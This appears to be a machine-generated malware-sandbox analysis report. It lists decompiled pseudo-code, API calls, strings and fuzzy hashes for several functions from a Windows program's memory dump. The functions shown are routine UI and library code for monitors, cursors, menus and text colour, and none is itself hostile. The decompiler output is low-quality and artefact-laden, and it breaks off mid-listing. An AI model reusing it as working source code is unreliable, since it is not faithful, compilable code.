Function 00422674, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00422674(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x47b93b != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x47b91c; // 0x422674
					 *0x47b91c = E004223DC(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x47b91c(_a4, _a8, _t19);
				}
				return _t16;
			}

0x0042267a
0x00422684
0x004226ae
0x004226b7
0x004226df
0x004226df
0x004226b9
0x004226b9
0x004226be
0x00000000
0x00000000
0x004226be
0x00422686
0x0042268b
0x00422698
0x004226aa
0x004226aa
0x004226ea

APIs

GetSystemMetrics.USER32(00000000), ref: 004226C2
GetSystemMetrics.USER32(00000001), ref: 004226D4

Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C

Strings

t&B, xrefs: 0042268B, 00422698, 004226A4
MonitorFromPoint, xrefs: 00422686

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint$t&B
API String ID: 1792783759-279512042
Opcode ID: 091e179d08b7bf2d68c8b872db753bedd57ffbcfe8a7dc55854c962867b8c56d
Instruction ID: ce2432db17b2679b6663cebfca3f23656decf4f4bcd8f6936f0e96787b851a9f
Opcode Fuzzy Hash: 091e179d08b7bf2d68c8b872db753bedd57ffbcfe8a7dc55854c962867b8c56d
Instruction Fuzzy Hash: 2A018FB230112C7FDB008F65ED44B5EBB65EB54358F808027FB299B251C3B99D81DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0042254C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042254C(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x47b93a != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x47b918; // 0x42254c
					 *0x47b918 = E004223DC(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x47b918(_t14, _t17);
				}
				return _t19;
			}

0x00422552
0x00422555
0x0042255f
0x00422584
0x0042258d
0x004225b4
0x004225b4
0x00422561
0x00422566
0x00422573
0x00422580
0x00422580
0x004225bf

APIs

GetSystemMetrics.USER32(00000000), ref: 0042259D
GetSystemMetrics.USER32(00000001), ref: 004225A9

Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C

Strings

L%B, xrefs: 00422566, 00422573, 0042257A
MonitorFromRect, xrefs: 00422561

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: L%B$MonitorFromRect
API String ID: 1792783759-2746502784
Opcode ID: 9e372c43607e1fbc025afe3c63253c7892b9cccd086f8366b47bfe3b74f2fe40
Instruction ID: 089b6596411a76f101efcd3eb32e463643eea47367bb00420d7be0f5d702ef89
Opcode Fuzzy Hash: 9e372c43607e1fbc025afe3c63253c7892b9cccd086f8366b47bfe3b74f2fe40
Instruction Fuzzy Hash: ED018FB1700228BBD7208B14FA99716B754E740325F948466FB18CB356C3B8DDC09BF9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB0C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CB0C() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x479134 = _t1;
				}
				if( *0x479134 == 0) {
					 *0x479134 = E004085C0;
					return E004085C0;
				}
				return _t1;
			}

0x0040cb12
0x0040cb17
0x0040cb1b
0x0040cb23
0x0040cb28
0x0040cb28
0x0040cb34
0x0040cb3b
0x00000000
0x0040cb3b
0x0040cb41

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040D5D5,00000000,0040D5E8), ref: 0040CB12
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040CB23

Strings

GetDiskFreeSpaceExA, xrefs: 0040CB1D
kernel32.dll, xrefs: 0040CB0D

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 120b078a31e260d99c8a0445781d53517275d76df67d6c3987e5b6ac9ab3095c
Instruction ID: f5d9991338859320518574272b253108a6fd8a2abe6d3c5a2defb8d85a16c2a7
Opcode Fuzzy Hash: 120b078a31e260d99c8a0445781d53517275d76df67d6c3987e5b6ac9ab3095c
Instruction Fuzzy Hash: 5FD05EB0202342DEE7006BA47DC7B0633B4C300304F40213B6241762C1D67C9CA08A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00429E68, Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00429E68(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x47bb38 != 0) {
					L3:
					_t49 =  *0x47bb18; // 0x0
					_t50 =  *0x47bb18; // 0x0
					_t117 = E00429D48(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x47bb38 == 0) {
						_t168 =  *0x47bb3c;
						if( *0x47bb3c != 0) {
							_t106 =  *0x47bb2c; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x47bb3c; // 0x0
							E00433E08(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x47bb18; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x47bb38;
						_t6 =  &_v24;
						 *_t6 =  *0x47bb38 != 0;
						__eflags =  *_t6;
						 *0x47bb38 = 2;
					} else {
						 *0x47bb38 = 1;
						_v24 = 0;
					}
					_t54 =  *0x47bb1c; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x47bb1c; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x47bb1c; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x47bb1c; // 0x0
							E0042BA9C( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x47bb1c; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00429D98(2);
						_t121 =  *_t155;
						_t60 =  *0x47bb1c; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x47bb3c != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x47bb3c; // 0x0
								E00433DF0(_t82, _t158);
								_t84 =  *0x47bb3c; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x47bb3c; // 0x0
									E00433EF0(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x47bb3c; // 0x0
									E00433E08(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x47bb3c; // 0x0
								E00433F64(_t91, _t131, __eflags);
								_t93 =  *0x47a0fc; // 0x47bba0
								SetCursor(E00449384( *_t93, _t121, _t158));
							}
						}
						_t62 =  *0x47a0fc; // 0x47bba0
						_t65 = SetCursor(E00449384( *_t62, _t121, _t158));
						if( *0x47bb38 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00429DD4(_t121);
								_t67 =  *0x47bb1c; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0042BA9C(_t118,  &_v24, _t155);
									_t65 = E00403674(_t118, __eflags);
									_t135 =  *0x47bb1c; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x47bb1c; // 0x0
									_t65 = E00403674( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x47bb1c; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x47bb1c; // 0x0
								_t65 = E00403674( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x47bb1c == 0) {
								goto L32;
							} else {
								_t119 =  *0x47bb1c; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00407D88(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x47bb1c; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x47bb1c; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x47bb1c; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00429D98(1);
					if( *0x47bb1c == 0) {
						goto L32;
					}
					_t102 =  *0x47bb1c; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x47bb1c; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x47bb1c; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00429D98(0);
					if( *0x47bb1c == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x47bb28; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x47bb34; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x47bb2c; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x47bb34; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

0x00429e6e
0x00429e77
0x00429ea6
0x00429ea6
0x00429eac
0x00429ec2
0x00429ecb
0x00429ecd
0x00429ed4
0x00429ed6
0x00429edc
0x00429ee9
0x00429eee
0x00429eee
0x00429ed4
0x00429ef3
0x00429eff
0x00429f0f
0x00429f16
0x00429f16
0x00429f16
0x00429f1b
0x00429f01
0x00429f01
0x00429f08
0x00429f08
0x00429f22
0x00429f2a
0x00429f77
0x00429f77
0x00429f7e
0x00429f84
0x00429f87
0x00429f90
0x00429f98
0x00429fa0
0x00429fa5
0x00429fae
0x00429fb5
0x00429fb5
0x00429fc3
0x00429fc5
0x00429fc7
0x00429fd1
0x00429fda
0x00429fde
0x00429fe8
0x00429fed
0x00429ff2
0x00429ff7
0x00429ffb
0x0042a016
0x0042a01b
0x0042a020
0x00429ffd
0x0042a001
0x0042a008
0x0042a00a
0x0042a00f
0x0042a00f
0x0042a027
0x0042a027
0x0042a02c
0x0042a034
0x0042a041
0x0042a041
0x00429fde
0x0042a049
0x0042a056
0x0042a062
0x0042a135
0x0042a135
0x0042a068
0x0042a068
0x0042a06a
0x0042a08b
0x0042a08d
0x0042a092
0x0042a095
0x0042a097
0x0042a0c5
0x0042a0d4
0x0042a0d9
0x0042a0df
0x0042a099
0x0042a0a1
0x0042a0ad
0x0042a0b2
0x0042a0b8
0x0042a0b8
0x0042a06c
0x0042a06f
0x0042a072
0x0042a07f
0x0042a07f
0x0042a0e9
0x00000000
0x0042a0eb
0x0042a0eb
0x0042a0f1
0x0042a0f4
0x0042a0fc
0x0042a103
0x00000000
0x00000000
0x0042a10a
0x0042a10c
0x0042a113
0x0042a113
0x0042a116
0x0042a11d
0x0042a120
0x0042a12b
0x0042a12c
0x0042a12d
0x0042a12e
0x00000000
0x0042a12e
0x0042a0e9
0x0042a062
0x00429f2e
0x00429f3a
0x00000000
0x00000000
0x00429f40
0x00429f45
0x00429f48
0x00429f50
0x00429f53
0x00429f5a
0x00429f60
0x00429f65
0x00429f71
0x00000000
0x00000000
0x00000000
0x00429f71
0x00429e79
0x00429e80
0x00429e85
0x00429e8b
0x00000000
0x00000000
0x00429e8d
0x00429e95
0x00429e98
0x00429e9a
0x00429ea0
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 00429EDC
GetDesktopWindow.USER32 ref: 0042A001
SetCursor.USER32(00000000), ref: 0042A056

Part of subcall function 00433F64: ShowCursor.USER32(000000FF,00000000,?,0042A031), ref: 00433F9B

SetCursor.USER32(00000000), ref: 0042A041

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Cursor$DesktopWindow$Show
String ID:
API String ID: 110329033-0
Opcode ID: 5adc1ad0dc37a8aef5984fde5492fef3c723530a5e966329ec43c9332b01d92d
Instruction ID: 93a6a0a64c56c74e8b56e29971334b161be8d7344b98dcfc9055ad9bb7b0aa9e
Opcode Fuzzy Hash: 5adc1ad0dc37a8aef5984fde5492fef3c723530a5e966329ec43c9332b01d92d
Instruction Fuzzy Hash: 1F9129B43002558FC704DF29E984F56B7E1EB48304F55C56AEC088B7AAD738EC91CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00438DBC, Relevance: 6.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00438DBC(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E0043895C(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E0041FDD8(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E00421118(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041D034( *((intOrPtr*)(E004203A8( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00412A34(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E004203A8( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0041D3D8(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E0041D6C0(E004203A8( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00438A98(_t118));
						L0040D6BC();
						E00412A34(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E0041D6C0(E004203A8( *((intOrPtr*)(_t118 + 0x54))));
						E0041D034( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E0041D6C0(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00406464();
						E0041D034( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E0041D6C0(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00406464();
						return _t96;
					}
					_push(_a8);
					_push(E004387AC(_t142));
					E00438D94(_t118, _t142);
					_push(E004387AC(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E0041D6C0(__ecx));
					_push(_v8);
					_t117 = E00438A98(_t118);
					_push(_t117);
					L0040D6BC();
					return _t117;
				}
				return _t46;
			}

0x00438dbc
0x00438dc5
0x00438dc7
0x00438dca
0x00438dce
0x00438dd5
0x00438ddb
0x00438ddf
0x00438e25
0x00438e29
0x00438e37
0x00438e39
0x00438e40
0x00438e4c
0x00438e54
0x00438e56
0x00438e56
0x00438e69
0x00438e7d
0x00438e85
0x00438e89
0x00438e8e
0x00438e8f
0x00438e94
0x00438e96
0x00438e98
0x00438e9a
0x00438e9c
0x00438e9e
0x00438ea0
0x00438eaf
0x00438eb3
0x00438ebb
0x00438ebc
0x00438ed8
0x00438eea
0x00438ef5
0x00438f01
0x00438f09
0x00438f11
0x00438f16
0x00438f1b
0x00438f1d
0x00438f22
0x00438f26
0x00438f2a
0x00438f2f
0x00438f33
0x00438f33
0x00438f34
0x00438f35
0x00438f36
0x00438f43
0x00438f4f
0x00438f57
0x00438f5f
0x00438f64
0x00438f69
0x00438f6b
0x00438f70
0x00438f74
0x00438f78
0x00438f7c
0x00438f7d
0x00438f80
0x00438f81
0x00438f82
0x00000000
0x00438f82
0x00438de4
0x00438ded
0x00438df0
0x00438dfa
0x00438dfb
0x00438dfd
0x00438e02
0x00438e06
0x00438e0e
0x00438e12
0x00438e15
0x00438e1a
0x00438e1b
0x00000000
0x00438e1b
0x00438f8d

APIs

SetTextColor.GDI32(00000000,00FFFFFF), ref: 00438F09
SetBkColor.GDI32(00000000,00000000), ref: 00438F11

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Color$Text
String ID:
API String ID: 657580467-0
Opcode ID: e6854b70c551e24966f49b06a9b09ee5c5a5c5d1ca0b9d67ed5738eac0efddca
Instruction ID: 66dceec0eeb5f6bf747066e52f20414c5e0489b7b3ddc7cbc40ec211e9bbd80e
Opcode Fuzzy Hash: e6854b70c551e24966f49b06a9b09ee5c5a5c5d1ca0b9d67ed5738eac0efddca
Instruction Fuzzy Hash: CA512A71700214AFCB50FF69DD82F9E77ECAF08314F10106AB904EB286CA78EC458B69

Uniqueness

Uniqueness Score: -1.00%

Function 004456BC, Relevance: 6.1, APIs: 4, Instructions: 148
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004456BC(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t97;
				void* _t110;
				intOrPtr _t112;
				void* _t115;

				_t93 = 0;
				_v20 = 0;
				_t112 = __edx;
				_t92 = __eax;
				_push(_t115);
				_push(0x445882);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0043F1B8(_t39, 0, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t112 != 0 && ( *(_t112 + 0x1c) & 0x00000008) != 0) {
						_t112 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t112;
					if(_t112 != 0) {
						E004198D8(_t112, _t92);
					}
					if(_t112 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043286C(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043260C(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043286C(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043260C(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043286C(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t64 = GetMenu(E0043260C(_t92));
								_t137 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043260C(_t92), _t70);
								}
								E0043F1B8(_t112, E0043260C(_t92), _t137);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00446788(_t92, 1);
							}
							E004455F4(_t92);
							_pop(_t97);
							 *[fs:eax] = _t97;
							_push(0x445889);
							return E004041E0( &_v20);
						}
					}
				}
				_t77 =  *0x47bba0; // 0x2321310
				_t79 = E00448EF0(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t110 = 0;
					do {
						_t81 =  *0x47bba0; // 0x2321310
						if(_t112 ==  *((intOrPtr*)(E00448EDC(_t81, _t110) + 0x248))) {
							_t83 =  *0x47bba0; // 0x2321310
							if(_t92 != E00448EDC(_t83, _t110)) {
								_v16 =  *((intOrPtr*)(_t112 + 8));
								_v12 = 0xb;
								_t87 =  *0x479e24; // 0x41ada4
								E00405DCC(_t87, _t93,  &_v20);
								_t93 = _v20;
								E0040B658(_t92, _v20, 1, _t110, _t112, 0,  &_v16);
								E00403BF4();
							}
						}
						_t110 = _t110 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}

0x004456c5
0x004456c7
0x004456ca
0x004456cc
0x004456d0
0x004456d1
0x004456d6
0x004456d9
0x004456de
0x00445750
0x00445750
0x00445758
0x0044575c
0x0044575c
0x00445765
0x00445771
0x00445771
0x00445773
0x0044577b
0x00445781
0x00445781
0x00445788
0x0044583b
0x00445840
0x00445842
0x0044584e
0x0044584e
0x00000000
0x004457a1
0x004457ab
0x004457ba
0x00445814
0x0044581b
0x0044581f
0x00445824
0x00445826
0x00445832
0x00445832
0x00445826
0x00000000
0x0044581b
0x00000000
0x004457bc
0x004457bc
0x004457c5
0x004457d3
0x004457e0
0x004457e5
0x004457e7
0x004457f1
0x004457fd
0x004457fd
0x0044580d
0x0044580d
0x00445853
0x0044585a
0x00445860
0x00445860
0x00445867
0x0044586e
0x00445871
0x00445874
0x00445881
0x00445881
0x004457ab
0x00445788
0x004456e0
0x004456ea
0x004456ed
0x004456f0
0x004456f3
0x004456f5
0x004456f7
0x00445707
0x0044570b
0x00445717
0x0044571c
0x0044571f
0x0044572c
0x00445731
0x00445736
0x00445740
0x00445745
0x00445745
0x00445717
0x0044574a
0x0044574b
0x0044574b
0x0044574b
0x004456f5

APIs

GetMenu.USER32(00000000), ref: 004457E0
SetMenu.USER32(00000000,00000000), ref: 004457FD
SetMenu.USER32(00000000,00000000), ref: 00445832
SetMenu.USER32(00000000,00000000), ref: 0044584E

Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$LoadString
String ID:
API String ID: 3688185913-0
Opcode ID: 20ae3c6edcc02cb74be7a27c94a3bd204569640db0132ce70140699fa4395ba9
Instruction ID: e6bd4c774160fe46b81cdb2d10287adcd4332764a8085048f4f7701a946707cb
Opcode Fuzzy Hash: 20ae3c6edcc02cb74be7a27c94a3bd204569640db0132ce70140699fa4395ba9
Instruction Fuzzy Hash: 8551BF30A04A449BEF20BF3AD98675A77949F04308F48847BAC059B397CE7CDC458B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004298CC, Relevance: 6.1, APIs: 4, Instructions: 139
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

